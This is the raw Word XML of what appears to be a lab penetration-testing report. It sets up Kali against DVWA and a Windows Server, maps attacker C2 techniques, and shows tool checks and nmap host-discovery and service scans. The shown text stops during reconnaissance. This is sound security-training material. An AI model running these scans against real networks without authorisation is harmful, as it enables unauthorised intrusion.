    <w:p w14:paraId="5459FC72" w14:textId="4FED5DDA" w:rsidR="00E311F9" w:rsidRPr="00B40682" w:rsidRDefault="00E311F9" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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T1071 — Application Layer Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD2D772" w14:textId="1B367676" w:rsidR="00E311F9" w:rsidRPr="00B40682" w:rsidRDefault="00E311F9" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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T1573 — Encrypted Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A54452" w14:textId="2C84DC73"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scenario describes the tactics of genuine attackers, who apply encrypted C2 channels, switch communication paths, and mix with standard HTTPS traffic to avoid detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B822DA" w14:textId="1D73DA06" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00B40682" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc215851842"/>
      <w:bookmarkStart w:id="25" w:name="_Toc216881404"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>III. Attack Narrative</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="271DB36E" w14:textId="44BCDAC9" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_heading=h.sqzahmsq39wy" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="27" w:name="_Toc215851843"/>
      <w:bookmarkStart w:id="28" w:name="_Toc216881405"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lab Experiment Design</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidR="00B40682" w:rsidRPr="00B40682">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="3979393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Architecture Overview:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A949392" w14:textId="378A18A8"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This contains the setup of the attacker machine Kali, target machine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and Windows Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EE48C4"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Attacker Machine- Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406A637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IP Address is checked on the attacker machine Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C75B087"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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A021A03"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388A98FD" wp14:editId="449CE0AF">
            <wp:extent cx="2905125" cy="1971675"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="203145135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3"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2905125" cy="1971675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DACBF4E" w14:textId="77777777" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc215851880"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Figure 3: IP Address of attacker Kali</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="0733E17D"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IP address of the attacker machine Kali is checked here - 192.168.14.135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5E3D31" w14:textId="77777777" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>After that, the required tools are verified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765E7742"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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> --version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211225ED"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nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5045ADD1"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dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C2A1806"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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> --version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E863A4"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20A4D3D1" wp14:editId="42AC5AC0">
            <wp:extent cx="3057525" cy="1609725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="203145135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3057525" cy="1609725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F434CAB"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45052F2E" wp14:editId="5B760B68">
            <wp:extent cx="3048000" cy="2000250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="203145135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5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3048000" cy="2000250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E0F78B" w14:textId="77777777" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc215851881"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Figure 4: Verifying the required tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="0885448D"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Nmap version-&gt; 7.95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA37969" w14:textId="77777777"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Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> version-&gt; 2.5.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4975A715" w14:textId="77777777"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Dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Version -&gt; v2.22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF7419D" w14:textId="77777777" w:rsidR="00B13216"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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Version -&gt; 6.4.84-dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12897F2E" w14:textId="31D83C01"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b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check network connectivity to the Target </w:t>
      </w:r>
      <w:r w:rsidR="00B13216" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE0CA3F" w14:textId="51354268"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 xml:space="preserve">ping </w:t>
      </w:r>
      <w:r w:rsidR="00B13216" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBBB81E" w14:textId="3DA50590" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00B13216"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7ED34870" wp14:editId="1D51032B">
            <wp:extent cx="2907959" cy="1085850"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="1252657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57680" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2917659" cy="1089472"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15931996" w14:textId="0D7B542B" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc215851885"/>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00B13216" w:rsidRPr="00B40682">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve">: Checking Network connectivity to the target </w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidR="00B13216" w:rsidRPr="00B40682">
        <w:t>DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47495C4B" w14:textId="11835FA8"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Ping command is used to check the connectivity from the attacker machine Kali to the target machine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and the connection is well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64668A0D"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Windows Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCB08A3"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An on-premises Active Directory setup that had been simulated using Windows Server allowed for the practical testing of such R&amp;D infrastructure authentication weaknesses, lateral movement paths, SMB enumeration, and privilege-escalation behaviours being in enterprises.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24172EFB"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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6A807BD4" wp14:editId="512AE88E">
            <wp:extent cx="2686050" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2031451332"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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2686352" cy="2019527"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28721DE4"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="5C944D8B" wp14:editId="3159FFDE">
            <wp:extent cx="2743200" cy="1847850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="203145135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2743688" cy="1848179"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF16AFA" w14:textId="6827E19C" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc215851886"/>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00B13216" w:rsidRPr="00B40682">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:t>: Checking IP Address of Windows Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="7941A86B" w14:textId="52F89E30" w:rsidR="00B13216" w:rsidRPr="00B40682" w:rsidRDefault="00B13216" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26D96990" wp14:editId="44642625">
            <wp:extent cx="2785494" cy="1123950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1491757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757313" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2805404" cy="1131984"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F89CE4" w14:textId="5D49D7AF" w:rsidR="00B13216" w:rsidRPr="00B40682" w:rsidRDefault="00B13216" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:t>Figure 7: Checking Network connectivity to the target Windows Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D4466F"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b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Network Diagram:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9ED22F" w14:textId="45604A1A" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00B40682"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1A079586" wp14:editId="7C8A32A7">
            <wp:extent cx="2772460" cy="2042127"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="49135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51105" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2776573" cy="2045157"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F24850" w14:textId="75C07188" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc215851888"/>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00B13216" w:rsidRPr="00B40682">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:t>: Network Diagram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="47CD0CD7" w14:textId="35B60089"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diagram depicts a mixed setting in which Kali and Windows Server are on-premise and an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web server mimics the cloud VPC. The communication is done through HTTP/SSH and SMB, and the CI/CD pipelines connecting the environments indicate the lateral path of the attacker to data exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20725D9D"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System Descriptions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7E0AC7" w14:textId="75AFE268"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laboratory has three main systems that are the foundation of the experiments: Kali Linux that plays the role of the attacker platform for reconnoitring, exploiting, and C2; </w:t>
      </w:r>
      <w:r w:rsidR="00827135" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DVWA</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server, the cloud web portal hosting clinical-purpose data simulated; and Windows Server, the on-prem Active Directory environment that tests authentication paths, SMB enumeration, and lateral movement </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24705DB8" w14:textId="501550B2" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_heading=h.ivmitucbb872" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="35" w:name="_Toc215851844"/>
      <w:bookmarkStart w:id="36" w:name="_Toc216881406"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Attack Evaluation breakdown</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidR="00B40682" w:rsidRPr="00B40682">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="05C82521"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 xml:space="preserve">Phase: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4508D3"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1. Host discovery (ping sweep):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75707C70" w14:textId="77777777" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000"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color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nmap</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sn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.56.0/24 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> recon_ping.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7762C334"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6B96086F" wp14:editId="3F082815">
            <wp:extent cx="2713939" cy="3043123"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="203145133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2722635" cy="3052874"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E79F19" w14:textId="40D42C8F" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc215851889"/>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00B13216" w:rsidRPr="00B40682">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:t>: Finds live hosts on the subnet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="2ACF49A4"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256 IP addresses (256 hosts up) scanned in 37.64 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106BAB0C" w14:textId="27BF0007" w:rsidR="00FD661A" w:rsidRPr="00B40682" w:rsidRDefault="00FD661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2. Service &amp; version scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D48DDF6" w14:textId="744E9163"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nmap</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sV</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sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -O </w:t>
      </w:r>
      <w:r w:rsidR="00FD661A" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>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oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> recon_ports_services.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD1F5CF"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service version and basic script checks; OS hint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CFE835" w14:textId="7A80E0A8" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00FD661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3D378BBC" wp14:editId="1B1B03EE">
